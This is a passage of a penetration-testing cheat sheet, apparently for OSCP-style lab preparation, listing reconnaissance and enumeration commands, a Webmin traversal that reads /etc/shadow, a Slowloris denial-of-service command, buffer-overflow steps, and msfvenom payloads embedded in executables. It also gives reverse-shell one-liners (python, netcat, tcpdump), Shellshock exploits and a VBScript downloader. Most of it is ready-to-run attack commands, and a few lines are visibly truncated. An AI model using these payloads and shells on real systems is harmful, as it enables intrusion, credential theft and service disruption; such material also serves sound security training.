268 | - Banner Grabbing 269 | 270 | - `nc -v $ip 25` 271 | 272 | - `telnet $ip 25` 273 | 274 | - `nc TARGET-IP 80` 275 | 276 | - Recon-ng - full-featured web reconnaissance framework written in Python 277 | 278 | - `cd /opt; git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git ` 279 | 280 | `cd /opt/recon-ng ` 281 | 282 | `./recon-ng ` 283 | 284 | `show modules ` 285 | 286 | `help` 287 | 288 | - Active Information Gathering 289 | -------------------------------------------------------------------------------------------------------------------------- 290 | 291 | 292 | 293 | 294 | - Port Scanning 295 | ----------------------------------------------------------------------------------------------------------- 296 | *Subnet Reference Table* 297 | 298 | / | Addresses | Hosts | Netmask | Amount of a Class C 299 | --- | --- | --- | --- | --- 300 | /30 | 4 | 2 | 255.255.255.252| 1/64 301 | /29 | 8 | 6 | 255.255.255.248 | 1/32 302 | /28 | 16 | 14 | 255.255.255.240 | 1/16 303 | /27 | 32 | 30 | 255.255.255.224 | 1/8 304 | /26 | 64 | 62 | 255.255.255.192 | 1/4 305 | /25 | 128 | 126 | 255.255.255.128 | 1/2 306 | /24 | 256 | 254 | 255.255.255.0 | 1 307 | /23 | 512 | 510 | 255.255.254.0 | 2 308 | /22 | 1024 | 1022 | 255.255.252.0 | 4 309 | /21 | 2048 | 2046 | 255.255.248.0 | 8 310 | /20 | 4096 | 4094 | 255.255.240.0 | 16 311 | /19 | 8192 | 8190 | 255.255.224.0 | 32 312 | /18 | 16384 | 16382 | 255.255.192.0 | 64 313 | /17 | 32768 | 32766 | 255.255.128.0 | 128 314 | /16 | 65536 | 65534 | 255.255.0.0 | 256 315 | 316 | - Set the ip address as a variable 317 | `export ip=192.168.1.100 ` 318 | `nmap -A -T4 -p- $ip` 319 | 320 | - Netcat port Scanning 321 | `nc -nvv -w 1 -z $ip 3388-3390` 322 | 323 | - Discover active IPs usign ARP on the network: 324 | `arp-scan $ip/24` 325 | 326 | - Discover who else is on the network 327 | `netdiscover` 328 | 329 | - Discover IP Mac and Mac vendors from ARP 330 | `netdiscover -r $ip/24` 331 | 332 | - Nmap stealth scan using SYN 333 | `nmap -sS $ip` 334 | 335 | - Nmap stealth scan using FIN 336 | `nmap -sF $ip` 337 | 338 | - Nmap Banner Grabbing 339 | `nmap -sV -sT $ip` 340 | 341 | - Nmap OS Fingerprinting 342 | `nmap -O $ip` 343 | 344 | - Nmap Regular Scan: 345 | `nmap $ip/24` 346 | 347 | - Enumeration Scan 348 | `nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt` 349 | 350 | - Enumeration Scan All Ports TCP / UDP and output to a txt file 351 | `nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip` 352 | 353 | - Nmap output to a file: 354 | `nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24` 355 | 356 | - Quick Scan: 357 | `nmap -T4 -F $ip/24` 358 | 359 | - Quick Scan Plus: 360 | `nmap -sV -T4 -O -F --version-light $ip/24` 361 | 362 | - Quick traceroute 363 | `nmap -sn --traceroute $ip` 364 | 365 | - All TCP and UDP Ports 366 | `nmap -v -sU -sS -p- -A -T4 $ip` 367 | 368 | - Intense Scan: 369 | `nmap -T4 -A -v $ip` 370 | 371 | - Intense Scan Plus UDP 372 | `nmap -sS -sU -T4 -A -v $ip/24` 373 | 374 | - Intense Scan ALL TCP Ports 375 | `nmap -p 1-65535 -T4 -A -v $ip/24` 376 | 377 | - Intense Scan - No Ping 378 | `nmap -T4 -A -v -Pn $ip/24` 379 | 380 | - Ping scan 381 | `nmap -sn $ip/24` 382 | 383 | - Slow Comprehensive Scan 384 | `nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip/24` 385 | 386 | - Scan with Active connect in order to weed out any spoofed ports designed to troll you 387 | `nmap -p1-65535 -A -T5 -sT $ip` 388 | 389 | - Enumeration 390 | ----------- 391 | 392 | - DNS Enumeration 393 | 394 | - NMAP DNS Hostnames Lookup 395 | `nmap -F --dns-server ` 396 | 397 | - Host Lookup 398 | `host -t ns megacorpone.com` 399 | 400 | - Reverse Lookup Brute Force - find domains in the same range 401 | `for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"` 402 | 403 | - Perform DNS IP Lookup 404 | `dig a domain-name-here.com @nameserver` 405 | 406 | - Perform MX Record Lookup 407 | `dig mx domain-name-here.com @nameserver` 408 | 409 | - Perform Zone Transfer with DIG 410 | `dig axfr domain-name-here.com @nameserver` 411 | 412 | - DNS Zone Transfers 413 | Windows DNS zone transfer 414 | 415 | `nslookup -> set type=any -> ls -d blah.com ` 416 | 417 | Linux DNS zone transfer 418 | 419 | `dig axfr blah.com @ns1.blah.com` 420 | 421 | - Dnsrecon DNS Brute Force 422 | `dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml` 423 | 424 | - Dnsrecon DNS List of megacorp 425 | `dnsrecon -d megacorpone.com -t axfr` 426 | 427 | - DNSEnum 428 | `dnsenum zonetransfer.me` 429 | 430 | - NMap Enumeration Script List: 431 | 432 | - NMap Discovery 433 | [*https://nmap.org/nsedoc/categories/discovery.html*](https://nmap.org/nsedoc/categories/discovery.html) 434 | 435 | - Nmap port version detection MAXIMUM power 436 | `nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p ` 437 | 438 | 439 | - NFS (Network File System) Enumeration 440 | 441 | - Show Mountable NFS Shares 442 | `nmap -sV --script=nfs-showmount $ip` 443 | 444 | - RPC (Remote Procedure Call) Enumeration 445 | 446 | - Connect to an RPC share without a username and password and enumerate privledges 447 | `rpcclient --user="" --command=enumprivs -N $ip` 448 | 449 | - Connect to an RPC share with a username and enumerate privledges 450 | `rpcclient --user="" --command=enumprivs $ip` 451 | 452 | 453 | - SMB Enumeration 454 | 455 | - SMB OS Discovery 456 | `nmap $ip --script smb-os-discovery.nse` 457 | 458 | - Nmap port scan 459 | `nmap -v -p 139,445 -oG smb.txt $ip-254` 460 | 461 | - Netbios Information Scanning 462 | `nbtscan -r $ip/24` 463 | 464 | - Nmap find exposed Netbios servers 465 | `nmap -sU --script nbstat.nse -p 137 $ip` 466 | 467 | - Nmap all SMB scripts scan 468 | 469 | `nmap -sV -Pn -vv -p 445 --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip` 470 | 471 | - Nmap all SMB scripts authenticated scan 472 | 473 | `nmap -sV -Pn -vv -p 445 --script-args smbuser=,smbpass= --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip` 474 | 475 | - SMB Enumeration Tools 476 | `nmblookup -A $ip ` 477 | 478 | `smbclient //MOUNT/share -I $ip -N ` 479 | 480 | `rpcclient -U "" $ip ` 481 | 482 | `enum4linux $ip ` 483 | 484 | `enum4linux -a $ip` 485 | 486 | 487 | - SMB Finger Printing 488 | `smbclient -L //$ip` 489 | 490 | - Nmap Scan for Open SMB Shares 491 | `nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.10.0/24` 492 | 493 | - Nmap scans for vulnerable SMB Servers 494 | `nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $ip` 495 | 496 | - Nmap List all SMB scripts installed 497 | `ls -l /usr/share/nmap/scripts/smb*` 498 | 499 | - Enumerate SMB Users 500 | 501 | `nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14` 502 | 503 | OR 504 | 505 | `python /usr/share/doc/python-impacket-doc/examples /samrdump.py $ip` 506 | 507 | 508 | - RID Cycling - Null Sessions 509 | `ridenum.py $ip 500 50000 dict.txt` 510 | 511 | - Manual Null Session Testing 512 | 513 | Windows: `net use \\$ip\IPC$ "" /u:""` 514 | 515 | Linux: `smbclient -L //$ip` 516 | 517 | 518 | - SMTP Enumeration - Mail Severs 519 | 520 | - Verify SMTP port using Netcat 521 | `nc -nv $ip 25` 522 | 523 | - POP3 Enumeration - Reading other peoples mail - You may find usernames and passwords for email accounts, so here is how to check the mail using Telnet 524 | 525 | root@kali:~# telnet $ip 110 526 | +OK beta POP3 server (JAMES POP3 Server 2.3.2) ready 527 | USER billydean 528 | +OK 529 | PASS password 530 | +OK Welcome billydean 531 | 532 | list 533 | 534 | +OK 2 1807 535 | 1 786 536 | 2 1021 537 | 538 | retr 1 539 | 540 | +OK Message follows 541 | From: jamesbrown@motown.com 542 | Dear Billy Dean, 543 | 544 | Here is your login for remote desktop ... try not to forget it this time! 545 | username: billydean 546 | password: PA$$W0RD!Z 547 | 548 | 549 | - SNMP Enumeration -Simple Network Management Protocol 550 | 551 | - Fix SNMP output values so they are human readable 552 | `apt-get install snmp-mibs-downloader download-mibs ` 553 | `echo "" > /etc/snmp/snmp.conf` 554 | 555 | - SNMP Enumeration Commands 556 | 557 | - `snmpcheck -t $ip -c public` 558 | 559 | - `snmpwalk -c public -v1 $ip 1|` 560 | 561 | - `grep hrSWRunName|cut -d\* \* -f` 562 | 563 | - `snmpenum -t $ip` 564 | 565 | - `onesixtyone -c names -i hosts` 566 | 567 | - SNMPv3 Enumeration 568 | `nmap -sV -p 161 --script=snmp-info $ip/24` 569 | 570 | - Automate the username enumeration process for SNMPv3: 571 | `apt-get install snmp snmp-mibs-downloader ` 572 | `wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb` 573 | 574 | - SNMP Default Credentials 575 | /usr/share/metasploit-framework/data/wordlists/snmp\_default\_pass.txt 576 | 577 | 578 | - MS SQL Server Enumeration 579 | 580 | - Nmap Information Gathering 581 | 582 | `nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip` 583 | 584 | - Webmin and miniserv/0.01 Enumeration - Port 10000 585 | 586 | Test for LFI & file disclosure vulnerability by grabbing /etc/passwd 587 | 588 | `curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd` 589 | 590 | Test to see if webmin is running as root by grabbing /etc/shadow 591 | 592 | `curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow` 593 | 594 | - Linux OS Enumeration 595 | 596 | - List all SUID files 597 | `find / -perm -4000 2>/dev/null` 598 | 599 | - Determine the current version of Linux 600 | `cat /etc/issue` 601 | 602 | - Determine more information about the environment 603 | `uname -a` 604 | 605 | - List processes running 606 | `ps -xaf` 607 | 608 | - List the allowed (and forbidden) commands for the invoking use 609 | `sudo -l` 610 | 611 | - List iptables rules 612 | `iptables --table nat --list 613 | iptables -vL -t filter 614 | iptables -vL -t nat 615 | iptables -vL -t mangle 616 | iptables -vL -t raw 617 | iptables -vL -t security` 618 | 619 | - Windows OS Enumeration 620 | 621 | 622 | - net config Workstation 623 | 624 | - systeminfo | findstr /B /C:"OS Name" /C:"OS Version" 625 | 626 | - hostname 627 | 628 | - net users 629 | 630 | - ipconfig /all 631 | 632 | - route print 633 | 634 | - arp -A 635 | 636 | - netstat -ano 637 | 638 | - netsh firewall show state 639 | 640 | - netsh firewall show config 641 | 642 | - schtasks /query /fo LIST /v 643 | 644 | - tasklist /SVC 645 | 646 | - net start 647 | 648 | - DRIVERQUERY 649 | 650 | - reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated 651 | 652 | - reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated 653 | 654 | - dir /s *pass* == *cred* == *vnc* == *.config* 655 | 656 | - findstr /si password *.xml *.ini *.txt 657 | 658 | - reg query HKLM /f password /t REG_SZ /s 659 | 660 | - reg query HKCU /f password /t REG_SZ /s 661 | 662 | - Vulnerability Scanning with Nmap 663 | 664 | - Nmap Exploit Scripts 665 | [*https://nmap.org/nsedoc/categories/exploit.html*](https://nmap.org/nsedoc/categories/exploit.html) 666 | 667 | - Nmap search through vulnerability scripts 668 | `cd /usr/share/nmap/scripts/ 669 | ls -l \*vuln\*` 670 | 671 | - Nmap search through Nmap Scripts for a specific keyword 672 | `ls /usr/share/nmap/scripts/\* | grep ftp` 673 | 674 | - Scan for vulnerable exploits with nmap 675 | `nmap --script exploit -Pn $ip` 676 | 677 | - NMap Auth Scripts 678 | [*https://nmap.org/nsedoc/categories/auth.html*](https://nmap.org/nsedoc/categories/auth.html) 679 | 680 | - Nmap Vuln Scanning 681 | [*https://nmap.org/nsedoc/categories/vuln.html*](https://nmap.org/nsedoc/categories/vuln.html) 682 | 683 | - NMap DOS Scanning 684 | `nmap --script dos -Pn $ip 685 | NMap Execute DOS Attack 686 | nmap --max-parallelism 750 -Pn --script http-slowloris --script-args 687 | http-slowloris.runforever=true` 688 | 689 | - Scan for coldfusion web vulnerabilities 690 | `nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip` 691 | 692 | - Anonymous FTP dump with Nmap 693 | `nmap -v -p 21 --script=ftp-anon.nse $ip-254` 694 | 695 | - SMB Security mode scan with Nmap 696 | `nmap -v -p 21 --script=ftp-anon.nse $ip-254` 697 | 698 | - File Enumeration 699 | 700 | - Find UID 0 files root execution 701 | 702 | - `/usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\; 2>/dev/null` 703 | 704 | - Get handy linux file system enumeration script (/var/tmp) 705 | `wget https://highon.coffee/downloads/linux-local-enum.sh ` 706 | `chmod +x ./linux-local-enum.sh ` 707 | `./linux-local-enum.sh` 708 | 709 | - Find executable files updated in August 710 | `find / -executable -type f 2> /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep Aug` 711 | 712 | - Find a specific file on linux 713 | `find /. -name suid\*` 714 | 715 | - Find all the strings in a file 716 | `strings ` 717 | 718 | - Determine the type of a file 719 | `file ` 720 | 721 | - HTTP Enumeration 722 | ---------------- 723 | 724 | - Search for folders with gobuster: 725 | `gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip` 726 | 727 | - OWasp DirBuster - Http folder enumeration - can take a dictionary file 728 | 729 | - Dirb - Directory brute force finding using a dictionary file 730 | `dirb http://$ip/ wordlist.dict ` 731 | `dirb ` 732 | 733 | Dirb against a proxy 734 | 735 | - `dirb [http://$ip/](http://172.16.0.19/) -p $ip:3129` 736 | 737 | - Nikto 738 | `nikto -h $ip` 739 | 740 | - HTTP Enumeration with NMAP 741 | `nmap --script=http-enum -p80 -n $ip/24` 742 | 743 | - Nmap Check the server methods 744 | `nmap --script http-methods --script-args http-methods.url-path='/test' $ip` 745 | 746 | - Get Options available from web server 747 | `curl -vX OPTIONS vm/test` 748 | 749 | - Uniscan directory finder: 750 | `uniscan -qweds -u ` 751 | 752 | - Wfuzz - The web brute forcer 753 | 754 | `wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test ` 755 | 756 | `wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ ` 757 | 758 | `wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ"` 759 | 760 | `wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ` 761 | 762 | Recurse level 3 763 | 764 | `wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ` 765 | 766 | 767 | 768 | - Open a service using a port knock (Secured with Knockd) 769 | for x in 7000 8000 9000; do nmap -Pn --host\_timeout 201 770 | --max-retries 0 -p $x server\_ip\_address; done 771 | 772 | - WordPress Scan - Wordpress security scanner 773 | 774 | - wpscan --url $ip/blog --proxy $ip:3129 775 | 776 | - RSH Enumeration - Unencrypted file transfer system 777 | 778 | - auxiliary/scanner/rservices/rsh\_login 779 | 780 | - Finger Enumeration 781 | 782 | - finger @$ip 783 | 784 | - finger batman@$ip 785 | 786 | - TLS & SSL Testing 787 | 788 | - ./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U $ip | aha > 789 | OUTPUT-FILE.html 790 | 791 | - Proxy Enumeration (useful for open proxies) 792 | 793 | - nikto -useproxy http://$ip:3128 -h $ip 794 | 795 | - Steganography 796 | 797 | > apt-get install steghide 798 | > 799 | > steghide extract -sf picture.jpg 800 | > 801 | > steghide info picture.jpg 802 | > 803 | > apt-get install stegosuite 804 | 805 | - The OpenVAS Vulnerability Scanner 806 | 807 | - apt-get update 808 | apt-get install openvas 809 | openvas-setup 810 | 811 | - netstat -tulpn 812 | 813 | - Login at: 814 | https://$ip:9392 815 | 816 | Buffer Overflows and Exploits 817 | =================================================================================================================================== 818 | 819 | - DEP and ASLR - Data Execution Prevention (DEP) and Address Space 820 | Layout Randomization (ASLR) 821 | 822 | 823 | - Nmap Fuzzers: 824 | 825 | - NMap Fuzzer List 826 | [https://nmap.org/nsedoc/categories/fuzzer.html](https://nmap.org/nsedoc/categories/fuzzer.html) 827 | 828 | - NMap HTTP Form Fuzzer 829 | nmap --script http-form-fuzzer --script-args 830 | 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}' 831 | -p 80 $ip 832 | 833 | - Nmap DNS Fuzzer 834 | nmap --script dns-fuzz --script-args timelimit=2h $ip -d 835 | 836 | - MSFvenom 837 | [*https://www.offensive-security.com/metasploit-unleashed/msfvenom/*](https://www.offensive-security.com/metasploit-unleashed/msfvenom/) 838 | 839 | - Windows Buffer Overflows 840 | 841 | - Controlling EIP 842 | 843 | locate pattern_create 844 | pattern_create.rb -l 2700 845 | locate pattern_offset 846 | pattern_offset.rb -q 39694438 847 | 848 | - Verify exact location of EIP - [\*] Exact match at offset 2606 849 | 850 | buffer = "A" \* 2606 + "B" \* 4 + "C" \* 90 851 | 852 | - Check for “Bad Characters” - Run multiple times 0x00 - 0xFF 853 | 854 | - Use Mona to determine a module that is unprotected 855 | 856 | - Bypass DEP if present by finding a Memory Location with Read and Execute access for JMP ESP 857 | 858 | - Use NASM to determine the HEX code for a JMP ESP instruction 859 | 860 | /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb 861 | 862 | JMP ESP 863 | 00000000 FFE4 jmp esp 864 | 865 | - Run Mona in immunity log window to find (FFE4) XEF command 866 | 867 | !mona find -s "\xff\xe4" -m slmfc.dll 868 | found at 0x5f4a358f - Flip around for little endian format 869 | buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390 870 | 871 | - MSFVenom to create payload 872 | 873 | msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d" 874 | 875 | - Final Payload with NOP slide 876 | 877 | buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode 878 | 879 | - Create a PE Reverse Shell 880 | msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444 881 | -f 882 | exe -o shell\_reverse.exe 883 | 884 | - Create a PE Reverse Shell and Encode 9 times with 885 | Shikata\_ga\_nai 886 | msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444 887 | -f 888 | exe -e x86/shikata\_ga\_nai -i 9 -o 889 | shell\_reverse\_msf\_encoded.exe 890 | 891 | - Create a PE reverse shell and embed it into an existing 892 | executable 893 | msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444 -f 894 | exe -e x86/shikata\_ga\_nai -i 9 -x 895 | /usr/share/windows-binaries/plink.exe -o 896 | shell\_reverse\_msf\_encoded\_embedded.exe 897 | 898 | - Create a PE Reverse HTTPS shell 899 | msfvenom -p windows/meterpreter/reverse\_https LHOST=$ip 900 | LPORT=443 -f exe -o met\_https\_reverse.exe 901 | 902 | - Linux Buffer Overflows 903 | 904 | - Run Evans Debugger against an app 905 | edb --run /usr/games/crossfire/bin/crossfire 906 | 907 | - ESP register points toward the end of our CBuffer 908 | add eax,12 909 | jmp eax 910 | 83C00C add eax,byte +0xc 911 | FFE0 jmp eax 912 | 913 | - Check for “Bad Characters” Process of elimination - Run multiple 914 | times 0x00 - 0xFF 915 | 916 | - Find JMP ESP address 917 | "\\x97\\x45\\x13\\x08" \# Found at Address 08134597 918 | 919 | - crash = "\\x41" \* 4368 + "\\x97\\x45\\x13\\x08" + 920 | "\\x83\\xc0\\x0c\\xff\\xe0\\x90\\x90" 921 | 922 | - msfvenom -p linux/x86/shell\_bind\_tcp LPORT=4444 -f c -b 923 | "\\x00\\x0a\\x0d\\x20" –e x86/shikata\_ga\_nai 924 | 925 | - Connect to the shell with netcat: 926 | nc -v $ip 4444 927 | 928 | Shells 929 | =================================================================================================================================== 930 | 931 | - Netcat Shell Listener 932 | 933 | `nc -nlvp 4444` 934 | 935 | - Spawning a TTY Shell - Break out of Jail or limited shell 936 | You should almost always upgrade your shell after taking control of an apache or www user. 937 | 938 | (For example when you encounter an error message when trying to run an exploit sh: no job control in this shell ) 939 | 940 | (hint: sudo -l to see what you can run) 941 | 942 | - You may encounter limited shells that use rbash and only allow you to execute a single command per session. 943 | You can overcome this by executing an SSH shell to your localhost: 944 | 945 | ssh user@$ip nc $localip 4444 -e /bin/sh 946 | enter user's password 947 | python -c 'import pty; pty.spawn("/bin/sh")' 948 | export TERM=linux 949 | 950 | `python -c 'import pty; pty.spawn("/bin/sh")'` 951 | 952 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM); s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\["/bin/sh","-i"\]);' 953 | 954 | `echo os.system('/bin/bash')` 955 | 956 | `/bin/sh -i` 957 | 958 | `perl —e 'exec "/bin/sh";'` 959 | 960 | perl: `exec "/bin/sh";` 961 | 962 | ruby: `exec "/bin/sh"` 963 | 964 | lua: `os.execute('/bin/sh')` 965 | 966 | From within IRB: `exec "/bin/sh"` 967 | 968 | 969 | From within vi: `:!bash` 970 | or 971 | 972 | `:set shell=/bin/bash:shell` 973 | 974 | From within vim `':!bash':` 975 | 976 | From within nmap: `!sh` 977 | 978 | From within tcpdump 979 | 980 | echo $’id\\n/bin/netcat $ip 443 –e /bin/bash’ > /tmp/.test chmod +x /tmp/.test sudo tcpdump –ln –I eth- -w /dev/null –W 1 –G 1 –z /tmp/.tst –Z root 981 | 982 | From busybox `/bin/busybox telnetd -|/bin/sh -p9999` 983 | 984 | - Pen test monkey PHP reverse shell 985 | [http://pentestmonkey.net/tools/web-shells/php-reverse-shel](http://pentestmonkey.net/tools/web-shells/php-reverse-shell) 986 | 987 | - php-findsock-shell - turns PHP port 80 into an interactive shell 988 | [http://pentestmonkey.net/tools/web-shells/php-findsock-shell](http://pentestmonkey.net/tools/web-shells/php-findsock-shell) 989 | 990 | - Perl Reverse Shell 991 | [http://pentestmonkey.net/tools/web-shells/perl-reverse-shell](http://pentestmonkey.net/tools/web-shells/perl-reverse-shell) 992 | 993 | - PHP powered web browser Shell b374k with file upload etc. 994 | [https://github.com/b374k/b374k](https://github.com/b374k/b374k) 995 | 996 | - Windows reverse shell - PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell 997 | https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1 998 | 999 | - Web Backdoors from Fuzzdb 1000 | https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors 1001 | 1002 | - Creating Meterpreter Shells with MSFVenom - http://www.securityunlocked.com/2016/01/02/network-security-pentesting/most-useful-msfvenom-payloads/ 1003 | 1004 | *Linux* 1005 | 1006 | `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf` 1007 | 1008 | *Windows* 1009 | 1010 | `msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe` 1011 | 1012 | *Mac* 1013 | 1014 | `msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho` 1015 | 1016 | **Web Payloads** 1017 | 1018 | *PHP* 1019 | 1020 | `msfvenom -p php/reverse_php LHOST= LPORT= -f raw > shell.php` 1021 | 1022 | OR 1023 | 1024 | `msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php` 1025 | 1026 | Then we need to add the shell.php && pbpaste >> shell.php` 1029 | 1030 | *ASP* 1031 | 1032 | `msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp` 1033 | 1034 | *JSP* 1035 | 1036 | `msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp` 1037 | 1038 | *WAR* 1039 | 1040 | `msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war` 1041 | 1042 | **Scripting Payloads** 1043 | 1044 | *Python* 1045 | 1046 | `msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py` 1047 | 1048 | *Bash* 1049 | 1050 | `msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh` 1051 | 1052 | *Perl* 1053 | 1054 | `msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl` 1055 | 1056 | **Shellcode** 1057 | 1058 | For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits. 1059 | 1060 | *Linux Based Shellcode* 1061 | 1062 | `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f ` 1063 | 1064 | *Windows Based Shellcode* 1065 | 1066 | `msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f ` 1067 | 1068 | *Mac Based Shellcode* 1069 | 1070 | `msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f ` 1071 | 1072 | **Handlers** 1073 | Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format. 1074 | 1075 | use exploit/multi/handler 1076 | set PAYLOAD 1077 | set LHOST 1078 | set LPORT 1079 | set ExitOnSession false 1080 | exploit -j -z 1081 | 1082 | Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘ 1083 | 1084 | - SSH to Meterpreter: https://daemonchild.com/2015/08/10/got-ssh-creds-want-meterpreter-try-this/ 1085 | 1086 | use auxiliary/scanner/ssh/ssh_login 1087 | use post/multi/manage/shell_to_meterpreter 1088 | 1089 | - SBD.exe 1090 | 1091 | sbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. sbd features AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features. sbd supports TCP/IP communication only. 1092 | sbd.exe (part of the Kali linux distribution: /usr/share/windows-binaries/backdoors/sbd.exe) can be uploaded to a windows box as a Netcat alternative. 1093 | 1094 | - Shellshock 1095 | 1096 | - Testing for shell shock with NMap 1097 | 1098 | `root@kali:~/Documents# nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/admin.cgi $ip` 1099 | 1100 | - git clone https://github.com/nccgroup/shocker 1101 | 1102 | `./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose` 1103 | 1104 | - Shell Shock SSH Forced Command 1105 | Check for forced command by enabling all debug output with ssh 1106 | 1107 | ssh -vvv 1108 | ssh -i noob noob@$ip '() { :;}; /bin/bash' 1109 | 1110 | - cat file (view file contents) 1111 | 1112 | echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; echo \\$( 80, :DocumentRoot => Dir.pwd).start" 1136 | 1137 | - Run a basic PHP http server 1138 | php -S $ip:80 1139 | 1140 | - Creating a wget VB Script on Windows: 1141 | [*https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt*](https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt) 1142 | 1143 | - Windows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a Meterpreter shell. The following script can be copied and pasted into a basic windows reverse and used to transfer files from a web server (the timeout 1 commands are required after each new line): 1144 | 1145 | echo Set args = Wscript.Arguments >> webdl.vbs 1146 | timeout 1 1147 | echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs 1148 | timeout 1 1149 | echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> webdl.vbs 1150 | timeout 1 1151 | echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> webdl.vbs 1152 | timeout 1 1153 | echo xHttp.Open "GET", Url, False >> webdl.vbs 1154 | timeout 1 1155 | echo xHttp.Send >> webdl.vbs 1156 | timeout 1 1157 | echo with bStrm >> webdl.vbs 1158 | timeout 1 1159 | echo .type = 1 ' >> webdl.vbs 1160 | timeout 1 1161 | echo .open >> webdl.vbs 1162 | timeout 1 1163 | echo .write xHttp.responseBody >> webdl.vbs 1164 | timeout 1 1165 | echo .savetofile "C:\temp\windows-privesc-check2.exe", 2 ' >> webdl.vbs 1166 | timeout 1 